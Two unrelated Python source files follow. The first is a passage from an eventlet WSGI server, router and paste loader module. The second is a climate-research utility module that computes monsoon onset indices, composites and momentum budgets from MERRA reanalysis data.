self.dup_socket = sslutils.wrap(self.conf, self.dup_socket)
wsgi_kwargs = {
'func': eventlet.wsgi.server,
'sock': self.dup_socket,
'site': self.app,
'protocol': self._protocol,
'custom_pool': self._pool,
'log': self._logger,
'log_format': self.conf.wsgi_log_format,
'debug': False,
'keepalive': self.conf.wsgi_keep_alive,
'socket_timeout': self.client_socket_timeout
}
if self._max_url_len:
wsgi_kwargs['url_length_limit'] = self._max_url_len
self._server = eventlet.spawn(**wsgi_kwargs)
def _set_socket_opts(self, _socket):
_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# sockets can hang around forever without keepalive
_socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# This option isn't available in the OS X version of eventlet
if hasattr(socket, 'TCP_KEEPIDLE'):
_socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
self.conf.tcp_keepidle)
return _socket
def reset(self):
"""Reset server greenpool size to default.
:returns: None
"""
self._pool.resize(self.pool_size)
def stop(self):
"""Stops eventlet server. Doesn't allow accept new connecting.
:returns: None
"""
LOG.info(_LI("Stopping WSGI server."))
if self._server is not None:
# let eventlet close socket
self._pool.resize(0)
self._server.kill()
def wait(self):
"""Block, until the server has stopped.
Waits on the server's eventlet to finish, then returns.
:returns: None
"""
try:
if self._server is not None:
num = self._pool.running()
LOG.debug("Waiting WSGI server to finish %d requests.", num)
self._pool.waitall()
except greenlet.GreenletExit:
LOG.info(_LI("WSGI server has stopped."))
class Request(webob.Request):
pass
class Router(object):
"""WSGI middleware that maps incoming requests to WSGI apps."""
def __init__(self, mapper):
"""Create a router for the given routes.Mapper.
Each route in `mapper` must specify a 'controller', which is a
WSGI app to call. You'll probably want to specify an 'action' as
well and have your controller be an object that can route
the request to the action-specific method.
Examples:
mapper = routes.Mapper()
sc = ServerController()
# Explicit mapping of one route to a controller+action
mapper.connect(None, '/svrlist', controller=sc, action='list')
# Actions are all implicitly defined
mapper.resource('server', 'servers', controller=sc)
# Pointing to an arbitrary WSGI app. You can specify the
# {path_info:.*} parameter so the target app can be handed just that
# section of the URL.
mapper.connect(None, '/v1.0/{path_info:.*}', controller=BlogApp())
"""
self.map = mapper
self._router = routes.middleware.RoutesMiddleware(self._dispatch,
self.map)
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Route the incoming request to a controller based on self.map.
If no match, return a 404.
"""
return self._router
@staticmethod
@webob.dec.wsgify(RequestClass=Request)
def _dispatch(req):
"""Dispatch the request to the appropriate controller.
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
return webob.exc.HTTPNotFound()
app = match['controller']
return app
class ConfigNotFound(Exception):
def __init__(self, path):
msg = _('Could not find config at %(path)s') % {'path': path}
super(ConfigNotFound, self).__init__(msg)
class PasteAppNotFound(Exception):
def __init__(self, name, path):
msg = (_("Could not load paste app '%(name)s' from %(path)s") %
{'name': name, 'path': path})
super(PasteAppNotFound, self).__init__(msg)
class Loader(object):
"""Used to load WSGI applications from paste configurations."""
def __init__(self, conf):
"""Initialize the loader, and attempt to find the config.
:param conf
:returns: None
"""
conf.register_opts(_options.wsgi_opts)
self.config_path = None
config_path = conf.api_paste_config
if not os.path.isabs(config_path):
self.config_path = conf.find_file(config_path)
elif os.path.exists(config_path):
self.config_path = config_path
if not self.config_path:
raise ConfigNotFound(path=config_path)
def load_app(self, name):
"""Return the paste URLMap wrapped WSGI application.
:param name: Name of the application to load.
:returns: Paste URLMap object wrapping the requested application.
:raises: `PasteAppNotFound`
"""
try:
LOG.debug("Loading app %(name)s from %(path)s",
{'name': name, 'path': self.config_path})
return deploy.loadapp("config:%s" % self.config_path, name=name)
except LookupError:
LOG.exception(_LE("Couldn't lookup app: %s"), name)
raise PasteAppNotFound(name=name, path=self.config_path)
|
|
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import numpy as np
import pandas as pd
import xarray as xray
import matplotlib.pyplot as plt
import collections
import os
import json
import atmos as atm
import merra
import indices
# ----------------------------------------------------------------------
def wrapyear(data, data_prev, data_next, daymin, daymax, year=None):
"""Wrap daily data from previous and next years for extended day ranges.
"""
daynm = atm.get_coord(data, 'day', 'name')
def leap_adjust(data, year):
data = atm.squeeze(data)
ndays = 365
if year is not None and atm.isleap(year):
ndays += 1
else:
# Remove NaN for day 366 in non-leap year
data = atm.subset(data, {'day' : (1, ndays)})
return data, ndays
data, ndays = leap_adjust(data, year)
if data_prev is not None:
data_prev, ndays_prev = leap_adjust(data_prev, year - 1)
data_prev[daynm] = data_prev[daynm] - ndays_prev
data_out = xray.concat([data_prev, data], dim=daynm)
else:
data_out = data
if data_next is not None:
data_next, _ = leap_adjust(data_next, year + 1)
data_next[daynm] = data_next[daynm] + ndays
data_out = xray.concat([data_out, data_next], dim=daynm)
data_out = atm.subset(data_out, {daynm : (daymin, daymax)})
return data_out
# ----------------------------------------------------------------------
def wrapyear_all(data, daymin, daymax):
"""Wrap daily data to extended ranges over each year in yearly data."""
def extract_year(data, year, years):
if year in years:
data_out = atm.subset(data, {'year' : (year, year)})
else:
data_out = None
return data_out
daynm = atm.get_coord(data, 'day', 'name')
days = np.arange(daymin, daymax + 1)
days = xray.DataArray(days, name=daynm, coords={daynm : days})
years = atm.get_coord(data, 'year')
yearnm = atm.get_coord(data, 'year', 'name')
for y, year in enumerate(years):
year_prev, year_next = year - 1, year + 1
var = extract_year(data, year, years)
var_prev = extract_year(data, year_prev, years)
var_next = extract_year(data, year_next, years)
var_out = wrapyear(var, var_prev, var_next, daymin, daymax, year)
var_out = atm.expand_dims(var_out, 'year', year, axis=0)
var_out = var_out.reindex_like(days)
if y == 0:
data_out = var_out
else:
data_out = xray.concat([data_out, var_out], dim=yearnm)
return data_out
# ----------------------------------------------------------------------
def daily_rel2onset(data, d_onset, npre, npost):
"""Return subset of daily data aligned relative to onset day.
Parameters
----------
data : xray.DataArray
Daily data.
d_onset : ndarray
Array of onset date (day of year) for each year.
npre, npost : int
Number of days before and after onset to extract.
Returns
-------
data_out : xray.DataArray
Subset of N days of daily data for each year, where
N = npre + npost + 1 and the day dimension is
dayrel = day - d_onset.
"""
name, attrs, coords, dimnames = atm.meta(data)
yearnm = atm.get_coord(data, 'year', 'name')
daynm = atm.get_coord(data, 'day', 'name')
years = atm.makelist(atm.get_coord(data, 'year'))
if isinstance(d_onset, xray.DataArray):
d_onset = d_onset.values
else:
d_onset = atm.makelist(d_onset)
relnm = daynm + 'rel'
for y, year in enumerate(years):
dmin, dmax = d_onset[y] - npre, d_onset[y] + npost
subset_dict = {yearnm : (year, None), daynm : (dmin, dmax)}
sub = atm.subset(data, subset_dict)
sub = sub.rename({daynm : relnm})
sub[relnm] = sub[relnm] - d_onset[y]
sub[relnm].attrs['long_name'] = 'Day of year relative to onset day'
if y == 0:
data_out = sub
else:
data_out = xray.concat([data_out, sub], dim=yearnm)
data_out.attrs['d_onset'] = d_onset
return data_out
# ----------------------------------------------------------------------
def comp_days_centered(ndays, offset=0):
"""Return days for pre/onset/post composites centered on onset.
Parameters
----------
ndays : int
Number of days to average in each composite.
offset : int, optional
Number of offset days between pre/onset and onset/post
day ranges.
Returns
-------
reldays : dict of arrays
Components are 'pre', 'onset', and 'post', arrays of days
of the year relative to onset day, for each composite.
"""
ndays = int(ndays)
n1 = int(ndays // 2)
n2 = ndays - n1
reldays = collections.OrderedDict()
reldays['pre'] = np.arange(-offset - n1 - ndays, -offset - n1)
reldays['onset'] = np.arange(-n1, n2)
reldays['post'] = np.arange(offset + n2, offset + n2 + ndays)
return reldays
# ----------------------------------------------------------------------
def composite(data, compdays, return_avg=True, daynm='Dayrel'):
"""Return composite data fields for selected days.
Parameters
----------
data : xray.DataArray
Daily data to composite.
compdays: dict of arrays or lists
Lists of days to include in each composite.
return_avg : bool, optional
If True, return the mean of the selected days, otherwise
return the extracted individual days for each composite.
daynnm : str, optional
Name of day dimension in data.
Returns
-------
comp : dict of xray.DataArrays
Composite data fields for each key in compdays.keys().
"""
comp = collections.OrderedDict()
_, attrs, _, _ = atm.meta(data)
for key in compdays:
comp[key] = atm.subset(data, {daynm : (compdays[key], None)})
if return_avg:
comp[key] = comp[key].mean(dim=daynm)
comp[key].attrs = attrs
comp[key].attrs[daynm] = compdays[key]
return comp
# ----------------------------------------------------------------------
def get_mfc_box(mfcfiles, precipfiles, evapfiles, years, nroll, lat1, lat2,
lon1, lon2):
"""Return daily tseries MFC, precip and evap averaged over lat-lon box.
"""
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
databox = {}
if mfcfiles is not None:
mfc = atm.combine_daily_years('MFC', mfcfiles, years, yearname='year',
subset_dict=subset_dict)
databox['MFC'] = mfc
if precipfiles is not None:
pcp = atm.combine_daily_years('PRECTOT', precipfiles, years, yearname='year',
subset_dict=subset_dict)
databox['PCP'] = pcp
if evapfiles is not None:
evap = atm.combine_daily_years('EVAP', evapfiles, years, yearname='year',
subset_dict=subset_dict)
databox['EVAP'] = evap
nms = databox.keys()
for nm in nms:
var = databox[nm]
var = atm.precip_convert(var, var.attrs['units'], 'mm/day')
var = atm.mean_over_geobox(var, lat1, lat2, lon1, lon2)
databox[nm + '_UNSM'] = var
databox[nm + '_ACC'] = np.cumsum(var, axis=1)
if nroll is None:
databox[nm] = var
else:
databox[nm] = atm.rolling_mean(var, nroll, axis=-1, center=True)
tseries = xray.Dataset(databox)
return tseries
# ----------------------------------------------------------------------
def get_onset_indices(onset_nm, datafiles, years, data=None):
"""Return monsoon onset/retreat/length indices.
"""
# Options for CHP_MFC and CHP_PCP
lat1, lat2 = 10, 30
lon1, lon2 = 60, 100
chp_opts = [None, lat1, lat2, lon1, lon2]
if onset_nm == 'HOWI':
maxbreak = 10
npts = 100
ds = atm.combine_daily_years(['uq_int', 'vq_int'], datafiles, years,
yearname='year')
index, _ = indices.onset_HOWI(ds['uq_int'], ds['vq_int'], npts,
maxbreak=maxbreak)
index.attrs['title'] = 'HOWI (N=%d)' % npts
elif onset_nm == 'CHP_MFC':
if data is None:
tseries = get_mfc_box(datafiles, None, None, years, *chp_opts)
data = tseries['MFC_ACC']
index['ts_daily'] = tseries['MFC']
index = indices.onset_changepoint(data)
elif onset_nm == 'CHP_PCP':
if data is None:
tseries = get_mfc_box(None, datafiles, None, years, *chp_opts)
data = tseries['PCP_ACC']
index = indices.onset_changepoint(data)
index['ts_daily'] = tseries['PCP']
# Monsoon retreat and length indices
if 'retreat' in index:
index['length'] = index['retreat'] - index['onset']
else:
index['retreat'] = np.nan * index['onset']
index['length'] = np.nan * index['onset']
return index
# ----------------------------------------------------------------------
def get_enso_indices(years,
inds=['ONI_MAM', 'ONI_JJA', 'MEI_MARAPR', 'MEI_JULAUG'],
ensofiles=None):
"""Return ENSO indices.
"""
if ensofiles is None:
ensodir = atm.homedir() + 'dynamics/calc/ENSO/'
ensofiles = {'MEI' : ensodir + 'enso_mei.csv',
'ONI' : ensodir + 'enso_oni.csv'}
enso_in = {}
for key in ensofiles:
enso_in[key] = pd.read_csv(ensofiles[key], index_col=0)
enso = pd.DataFrame()
for key in enso_in:
for ssn in enso_in[key]:
enso[key + '_' + ssn] = enso_in[key][ssn]
enso = enso.loc[enso.index.isin(years)]
enso = enso[inds]
return enso
# ----------------------------------------------------------------------
def get_strength_indices(years, data_in, onset, retreat, yearnm='year',
daynm='day'):
"""Return various indices of the monsoon strength.
Input variables in data_in dataset are the unsmoothed daily values
averaged over the monsoon area.
"""
ssn = xray.Dataset()
coords = {yearnm : years}
ssn['onset'] = xray.DataArray(onset, coords=coords)
ssn['retreat'] = xray.DataArray(retreat, coords=coords)
ssn['length'] = ssn['retreat'] - ssn['onset']
for key in data_in.data_vars:
for key2 in ['_JJAS_AVG', '_JJAS_TOT', '_LRS_AVG', '_LRS_TOT']:
ssn[key + key2] = xray.DataArray(np.nan * np.ones(len(years)),
coords=coords)
for key in data_in.data_vars:
for y, year in enumerate(years):
d1 = int(onset.values[y])
d2 = int(retreat.values[y] - 1)
days_jjas = atm.season_days('JJAS', atm.isleap(year))
data = atm.subset(data_in[key], {yearnm : (year, None)})
data_jjas = atm.subset(data, {daynm : (days_jjas, None)})
data_lrs = atm.subset(data, {daynm : (d1, d2)})
ssn[key + '_JJAS_AVG'][y] = data_jjas.mean(dim=daynm).values
ssn[key + '_LRS_AVG'][y] = data_lrs.mean(dim=daynm).values
ssn[key + '_JJAS_TOT'][y] = ssn[key + '_JJAS_AVG'][y] * len(days_jjas)
ssn[key + '_LRS_TOT'][y] = ssn[key + '_LRS_AVG'][y] * ssn['length'][y]
ssn = ssn.to_dataframe()
return ssn
# ----------------------------------------------------------------------
def var_type(varnm):
keys = ['THETA', 'MSE', 'DSE', 'V*', 'abs_vort', 'EMFD', 'VFLXMSE']
test = [varnm.startswith(key) for key in keys]
if np.array(test).any():
vtype = 'calc'
else:
vtype = 'basic'
return vtype
# ----------------------------------------------------------------------
# def get_data_rel(varid, plev, years, datafiles, data, onset, npre, npost,
# yearnm='year', daynm='day', rel=True):
# """Return daily data relative to onset date.
#
# Data is read from datafiles if varnm is a basic variable.
# If varnm is a calculated variable (e.g. potential temperature),
# the base variables for calculation are provided in the dict data.
# """
#
# years = atm.makelist(years)
# onset = atm.makelist(onset)
# datafiles = atm.makelist(datafiles)
# daymin, daymax = min(onset) - npre, max(onset) + npost
#
# if isinstance(plev, int) or isinstance(plev, float):
# pres = atm.pres_convert(plev, 'hPa', 'Pa')
# elif plev == 'LML' and 'PS' in data:
# pres = data['PS']
# else:
# pres = None
#
# def get_var(data, varnm, plev=None):
# if plev is None:
# plev = ''
# elif plev == 'LML' and varnm == 'QV':
# varnm = 'Q'
# return data[varnm + str(plev)]
#
# if var_type(varid) == 'calc':
# print('Computing ' + varid)
# if varid == 'THETA':
# var = atm.potential_temp(get_var(data, 'T', plev), pres)
# elif varid == 'THETA_E':
# var = atm.equiv_potential_temp(get_var(data, 'T', plev), pres,
# get_var(data, 'QV', plev))
# elif varid == 'DSE':
# var = atm.dry_static_energy(get_var(data, 'T', plev),
# get_var(data, 'H', plev))
# elif varid == 'MSE':
# var = atm.moist_static_energy(get_var(data, 'T', plev),
# get_var(data, 'H', plev),
# get_var(data, 'QV', plev))
# elif varid == 'VFLXMSE':
# Lv = atm.constants.Lv.values
# var = data['VFLXCPT'] + data['VFLXPHI'] + data['VFLXQV'] * Lv
# var.attrs['units'] = data['VFLXCPT'].attrs['units']
# var.attrs['long_name'] = 'Vertically integrated MSE meridional flux'
# else:
# with xray.open_dataset(datafiles[0]) as ds:
# if varid not in ds.data_vars:
# varid = varid + str(plev)
# daynm_in = atm.get_coord(ds[varid], 'day', 'name')
# var = atm.combine_daily_years(varid, datafiles, years, yearname=yearnm,
# subset_dict={daynm_in : (daymin, daymax)})
# var = atm.squeeze(var)
#
# # Convert precip and evap to mm/day
# if varid in ['precip', 'PRECTOT', 'EVAP']:
# var = atm.precip_convert(var, var.attrs['units'], 'mm/day')
#
# # Align relative to onset day:
# if var_type(varid) == 'basic':
# daynm_in = atm.get_coord(var, 'day', 'name')
# if daynm_in != daynm:
# var = var.rename({daynm_in : daynm})
# if len(years) == 1:
# var = atm.expand_dims(var, yearnm, years[0], axis=0)
# if rel:
# print('Aligning data relative to onset day')
# var = daily_rel2onset(var, onset, npre, npost)
#
# return var
# ----------------------------------------------------------------------
def get_daily_data(varid, plev, years, datafiles, data, daymin=1,
daymax=366, yearnm='year'):
"""Return daily data (basic variable or calculated variable).
Data is read from datafiles if varnm is a basic variable.
If varnm is a calculated variable (e.g. potential temperature),
the base variables for calculation are provided in the dict data.
"""
years = atm.makelist(years)
datafiles = atm.makelist(datafiles)
if isinstance(plev, int) or isinstance(plev, float):
pres = atm.pres_convert(plev, 'hPa', 'Pa')
elif plev == 'LML' and 'PS' in data:
pres = data['PS']
else:
pres = None
def get_var(data, varnm, plev=None):
if plev is None:
plev = ''
elif plev == 'LML' and varnm == 'QV':
varnm = 'Q'
return data[varnm + str(plev)]
if var_type(varid) == 'calc':
print('Computing ' + varid)
if varid == 'THETA':
var = atm.potential_temp(get_var(data, 'T', plev), pres)
elif varid == 'THETA_E':
var = atm.equiv_potential_temp(get_var(data, 'T', plev), pres,
get_var(data, 'QV', plev))
elif varid == 'DSE':
var = atm.dry_static_energy(get_var(data, 'T', plev),
get_var(data, 'H', plev))
elif varid == 'MSE':
var = atm.moist_static_energy(get_var(data, 'T', plev),
get_var(data, 'H', plev),
get_var(data, 'QV', plev))
elif varid == 'VFLXMSE':
Lv = atm.constants.Lv.values
var = data['VFLXCPT'] + data['VFLXPHI'] + data['VFLXQV'] * Lv
var.attrs['units'] = data['VFLXCPT'].attrs['units']
var.attrs['long_name'] = 'Vertically integrated MSE meridional flux'
else:
with xray.open_dataset(datafiles[0]) as ds:
if varid not in ds.data_vars:
varid = varid + str(plev)
var = atm.combine_daily_years(varid, datafiles, years, yearname=yearnm,
subset_dict={'day' : (daymin, daymax)})
var = atm.squeeze(var)
# Make sure year dimension is included for single year
if len(years) == 1 and 'year' not in var.dims:
var = atm.expand_dims(var, yearnm, years[0], axis=0)
# Wrap years for extended day ranges
if daymin < 1 or daymax > 366:
var = wrapyear_all(var, daymin, daymax)
# Convert precip and evap to mm/day
if varid in ['precip', 'PRECTOT', 'EVAP']:
var = atm.precip_convert(var, var.attrs['units'], 'mm/day')
return var
# ----------------------------------------------------------------------
def get_data_rel(varid, plev, years, datafiles, data, onset, npre, npost):
"""Return daily data aligned relative to onset/withdrawal day.
"""
years = atm.makelist(years)
onset = atm.makelist(onset)
datafiles = atm.makelist(datafiles)
daymin = min(onset) - npre
daymax = max(onset) + npost
# For a single year, add extra year before/after, if necessary
wrap_single = False
years_in = years
if len(years) == 1 and var_type(varid) == 'basic':
filenm = datafiles[0]
year = years[0]
if daymin < 1:
wrap_single = True
file_pre = filenm.replace(str(year), str(year - 1))
if os.path.isfile(file_pre):
years_in = [year - 1] + years_in
datafiles = [file_pre] + datafiles
if daymax > len(atm.season_days('ANN', year)):
wrap_single = True
file_post = filenm.replace(str(year), str(year + 1))
if os.path.isfile(file_post):
years_in = years_in + [year + 1]
datafiles = datafiles + [file_post]
var = get_daily_data(varid, plev, years_in, datafiles, data, daymin=daymin,
daymax=daymax)
# Get rid of extra years
if wrap_single:
var = atm.subset(var, {'year' : (years[0], years[0])})
# Make sure year dimension is included for single year
if len(years) == 1 and 'year' not in var.dims:
var = atm.expand_dims(var, 'year', years[0], axis=0)
# Align relative to onset day
# (not needed for calc variables since they're already aligned)
if var_type(varid) == 'basic':
print('Aligning data relative to onset day')
var = daily_rel2onset(var, onset, npre, npost)
return var
# ----------------------------------------------------------------------
def load_dailyrel(datafiles, yearnm='year', onset_varnm='D_ONSET',
retreat_varnm='D_RETREAT'):
ds = atm.load_concat(datafiles, concat_dim=yearnm)
if isinstance(ds, xray.DataArray):
ds = ds.to_dataset()
varnms = ds.data_vars.keys()
if onset_varnm is not None:
onset = ds[onset_varnm]
varnms.remove(onset_varnm)
else:
onset = np.nan * ds[yearnm]
if retreat_varnm is not None:
retreat = ds[retreat_varnm]
varnms.remove(retreat_varnm)
else:
retreat = np.nan * ds[yearnm]
# Remaining data variable is the data field
varnm = varnms[0]
data = ds[varnm]
# Copy attributes from the first file in the list
with xray.open_dataset(datafiles[0]) as ds0:
data.attrs = ds0[varnm].attrs
return data, onset, retreat
# ----------------------------------------------------------------------
def plot_colorbar(symmetric, orientation='vertical', ax=None, **kwargs):
if ax is None:
ax = plt.gca()
if symmetric:
atm.colorbar_symm(orientation=orientation, ax=ax, **kwargs)
else:
plt.colorbar(orientation=orientation, ax=ax, **kwargs)
# ----------------------------------------------------------------------
def contourf_lat_time(lat, days, plotdata, clev=None, title='', cmap='RdBu_r',
onset_nm='', zero_line=False, ax=None):
if ax is None:
ax = plt.gca()
vals = plotdata.values.T
vals = np.ma.array(vals, mask=np.isnan(vals))
ncont = 40
symmetric = atm.symm_colors(plotdata)
if clev == None:
cint = atm.cinterval(vals, n_pref=ncont, symmetric=symmetric)
clev = atm.clevels(vals, cint, symmetric=symmetric)
cf = ax.contourf(days, lat, vals, clev, cmap=cmap)
plt.colorbar(mappable=cf, ax=ax)
#plot_colorbar(symmetric, ax=ax, mappable=cf)
if symmetric and zero_line:
ax.contour(days, lat, vals, [0], colors='k')
ax.grid(True)
ax.set_ylabel('Latitude')
ax.set_xlabel('Day Relative to %s Onset' % onset_nm)
ax.set_title(title)
xmin, xmax = ax.get_xlim()
if xmax > 60:
ax.set_xticks(range(int(xmin), int(xmax) + 1, 30))
plt.draw()
# ----------------------------------------------------------------------
def plotyy(data1, data2=None, xname='dayrel', data1_styles=None,
y2_opts={'color' : 'r', 'alpha' : 0.6, 'linewidth' : 2},
xlims=None, xticks=None, ylims=None, yticks=None, y2_lims=None,
xlabel='', y1_label='', y2_label='', legend=False,
legend_kw={'fontsize' : 9, 'handlelength' : 2.5},
x0_axvlines=None, grid=True):
"""Plot data1 and data2 together on different y-axes."""
data1, data2 = atm.to_dataset(data1), atm.to_dataset(data2)
for nm in data1.data_vars:
if data1_styles is None:
plt.plot(data1[xname], data1[nm], label=nm)
elif isinstance(data1_styles[nm], dict):
plt.plot(data1[xname], data1[nm], label=nm, **data1_styles[nm])
else:
plt.plot(data1[xname], data1[nm], data1_styles[nm], label=nm)
atm.ax_lims_ticks(xlims, xticks, ylims, yticks)
plt.grid(grid)
if x0_axvlines is not None:
for x0 in x0_axvlines:
plt.axvline(x0, color='k')
plt.xlabel(xlabel)
plt.ylabel(y1_label)
axes = [plt.gca()]
if data2 is not None:
plt.sca(plt.gca().twinx())
for nm in data2.data_vars:
plt.plot(data2[xname], data2[nm], label=nm, **y2_opts)
if y2_lims is not None:
plt.ylim(y2_lims)
if 'linewidth' in y2_opts:
y2_opts.pop('linewidth')
atm.fmt_axlabels('y', y2_label, **y2_opts)
atm.ax_lims_ticks(xlims, xticks)
axes = axes + [plt.gca()]
if legend:
if data2 is None:
plt.legend(**legend_kw)
else:
atm.legend_2ax(axes[0], axes[1], **legend_kw)
return axes
# ----------------------------------------------------------------------
def eddy_decomp(var, nt, lon1, lon2, taxis=0):
"""Decompose variable into mean and eddy fields."""
lonname = atm.get_coord(var, 'lon', 'name')
tstr = 'Time mean (%d-%s rolling)' % (nt, var.dims[taxis])
lonstr = atm.latlon_labels([lon1, lon2], 'lon', deg_symbol=False)
lonstr = 'zonal mean (' + '-'.join(lonstr) + ')'
name, attrs, coords, dims = atm.meta(var)
varbar = atm.rolling_mean(var, nt, axis=taxis, center=True)
varbarzon = atm.subset(varbar, {lonname : (lon1, lon2)})
varbarzon = varbarzon.mean(dim=lonname)
varbarzon.attrs = attrs
comp = xray.Dataset()
comp[name + '_AVG'] = varbarzon
comp[name + '_AVG'].attrs['component'] = tstr + ', ' + lonstr
comp[name + '_ST'] = varbar - varbarzon
comp[name + '_ST'].attrs = attrs
comp[name + '_ST'].attrs['component'] = 'Stationary eddy'
comp[name + '_TR'] = var - varbar
comp[name + '_TR'].attrs = attrs
comp[name + '_TR'].attrs['component'] = 'Transient eddy'
return comp
# ----------------------------------------------------------------------
def latlon_data(var, latmax=89):
"""Return lat, lon coords in radians and cos(lat)."""
data = xray.Dataset()
# Latitude
latname = atm.get_coord(var, 'lat', 'name')
latdim = atm.get_coord(var, 'lat', 'dim')
lat = atm.get_coord(var, 'lat')
latcoords = {latname: lat.copy()}
lat[abs(lat) > latmax] = np.nan
data['LAT'] = xray.DataArray(lat, coords=latcoords)
latrad = np.radians(lat)
data['LATRAD'] = xray.DataArray(latrad, coords=latcoords)
data['COSLAT'] = np.cos(data['LATRAD'])
data.attrs['latname'] = latname
data.attrs['latdim'] = latdim
# Longitude
try:
lonname = atm.get_coord(var, 'lon', 'name')
londim = atm.get_coord(var, 'lon', 'dim')
lon = atm.get_coord(var, 'lon')
loncoords = {lonname : lon.copy()}
data['LON'] = xray.DataArray(lon, coords=loncoords)
lonrad = np.radians(lon)
data['LONRAD'] = xray.DataArray(lonrad, coords=loncoords)
data.attrs['lonname'] = lonname
data.attrs['londim'] = londim
except ValueError:
data.attrs['lonname'] = None
data.attrs['londim'] = None
return data
# ----------------------------------------------------------------------
def advection(uflow, vflow, omegaflow, u, dudp):
"""Return x, y and p components of advective terms in momentum budget.
"""
a = atm.constants.radius_earth
latlon = latlon_data(u)
latdim, londim = latlon.attrs['latdim'], latlon.attrs['londim']
latrad, coslat = latlon['LATRAD'], latlon['COSLAT']
if londim is not None:
lonrad = latlon['LONRAD']
ds = xray.Dataset()
if londim is not None:
ds['X'] = atm.gradient(u, lonrad, londim) * uflow / (a*coslat)
else:
ds['X'] = 0.0 * u
ds['Y'] = atm.gradient(u*coslat, latrad, latdim) * vflow / (a*coslat)
ds['P'] = omegaflow * dudp
return ds
# ----------------------------------------------------------------------
def fluxdiv(u, v, omega, dudp, domegadp):
"""Return x, y and p components of EMFD terms in momentum budget.
"""
a = atm.constants.radius_earth
latlon = latlon_data(u)
latdim, londim = latlon.attrs['latdim'], latlon.attrs['londim']
latrad, coslat = latlon['LATRAD'], latlon['COSLAT']
coslat = latlon['COSLAT']
coslat_sq = coslat ** 2
if londim is not None:
lonrad = latlon['LONRAD']
ds = xray.Dataset()
if londim is not None:
ds['X'] = atm.gradient(u * u, lonrad, londim) / (a*coslat)
else:
ds['X'] = 0.0 * u
ds['Y'] = atm.gradient(u * v * coslat_sq, latrad, latdim) / (a*coslat_sq)
ds['P'] = omega * dudp + u * domegadp
return ds
# ----------------------------------------------------------------------
def calc_ubudget(datafiles, ndays, lon1, lon2, plev=200):
"""Calculate momentum budget for daily data in one year.
Keys of datafiles dict must be: U, V, DUDP, H, OMEGA, DOMEGADP, DUDTANA
"""
# Read data
data = xray.Dataset()
for nm in datafiles:
print('Reading ' + datafiles[nm])
with xray.open_dataset(datafiles[nm]) as ds:
if nm in ds.data_vars:
var = ds[nm]
else:
var = ds[nm + '%d' % plev]
if 'Day' in var.dims:
var = var.rename({'Day' : 'day'})
data[nm] = atm.squeeze(var)
data[nm].load()
data['PHI'] = atm.constants.g.values * data['H']
# Put zeros in for any missing variables (e.g. du/dp)
for nm in ['OMEGA', 'DUDP', 'DOMEGADP', 'DUDTANA']:
if nm not in data.data_vars:
data[nm] = 0.0 * data['U']
# Eddy decomposition
taxis = 0
for nm in data.data_vars:
print('Eddy decomposition for ' + nm)
comp = eddy_decomp(data[nm], ndays, lon1, lon2, taxis)
for compnm in comp:
data[compnm] = comp[compnm]
# Momentum budget calcs
# du/dt = sum of terms in ubudget
ubudget = xray.Dataset()
readme = 'Momentum budget: ACCEL = sum of all other data variables'
ubudget.attrs['readme'] = readme
ubudget.attrs['ndays'] = ndays
ubudget.attrs['lon1'] = lon1
ubudget.attrs['lon2'] = lon2
# Advective terms
keypairs = [ ('AVG', 'AVG'), ('AVG', 'ST'), ('ST', 'AVG')]
print('Computing advective terms')
for pair in keypairs:
print(pair)
ukey, flowkey = pair
u = data['U_' + ukey]
dudp = data['DUDP_' + ukey]
uflow = data['U_' + flowkey]
vflow = data['V_' + flowkey]
omegaflow = data['OMEGA_' + flowkey]
adv = advection(uflow, vflow, omegaflow, u, dudp)
for nm in adv.data_vars:
key = 'ADV_%s_%s_%s' % (ukey, flowkey, nm)
ubudget[key] = - adv[nm]
long_name = 'Advection of %s momentum by %s' % (ukey, flowkey)
ubudget[key].attrs['long_name'] = long_name
# EMFD terms
keys = ['TR', 'ST']
print('Computing EMFD terms')
for key in keys:
print(key)
u = data['U_' + key]
v = data['V_' + key]
omega = data['OMEGA_' + key]
dudp = data['DUDP_' + key]
domegadp = data['DOMEGADP_' + key]
emfd = fluxdiv(u, v, omega, dudp, domegadp)
for nm in emfd.data_vars:
ubudget['EMFC_%s_%s' % (key, nm)] = - emfd[nm]
# Coriolis terms
latlon = latlon_data(data['V_ST'])
lat = latlon['LAT']
f = atm.coriolis(lat)
ubudget['COR_AVG'] = data['V_AVG'] * f
ubudget['COR_ST'] = data['V_ST'] * f
# Pressure gradient terms
a = atm.constants.radius_earth.values
coslat = latlon['COSLAT']
lonrad = latlon['LONRAD']
londim = atm.get_coord(data['PHI_ST'], 'lon', 'dim')
ubudget['PGF_ST'] = - atm.gradient(data['PHI_ST'], lonrad, londim) / (a*coslat)
# Analysis increment for dU/dt
ubudget['ANA'] = data['DUDTANA']
# Time mean
print('Computing rolling time mean')
for nm in ubudget.data_vars:
ubudget[nm] = atm.rolling_mean(ubudget[nm], ndays, axis=taxis, center=True)
# Acceleration
nseconds = 60 * 60 * 24 * ndays
delta_u = np.nan * data['U']
u = data['U'].values
delta_u.values[ndays//2:-ndays//2] = (u[ndays:] - u[:-ndays]) / nseconds
ubudget['ACCEL'] = delta_u
return ubudget, data
# ----------------------------------------------------------------------
def v_components(ubudget, scale=None, eqbuf=5.0):
"""Return mean, eddy-driven, etc components of v for streamfunction.
"""
comp_dict = {'MMC' : 'ADV_AVG', 'PGF' : 'PGF_ST', 'EDDY_ST' : 'EMFC_ST',
'EDDY_TR' : 'EMFC_TR', 'EDDY_CRS' : 'ADV_CRS'}
if scale is not None:
ubudget = ubudget * scale
latname = atm.get_coord(ubudget, 'lat', 'name')
lat = ubudget[latname]
f = atm.coriolis(lat)
f[abs(lat) < eqbuf] = np.nan
v = xray.Dataset()
v['TOT'] = ubudget['COR'] / f
for nm in sorted(comp_dict):
v[nm] = - ubudget[comp_dict[nm]] / f
v['EDDY'] = v['EDDY_CRS'] + v['EDDY_TR'] + v['EDDY_ST']
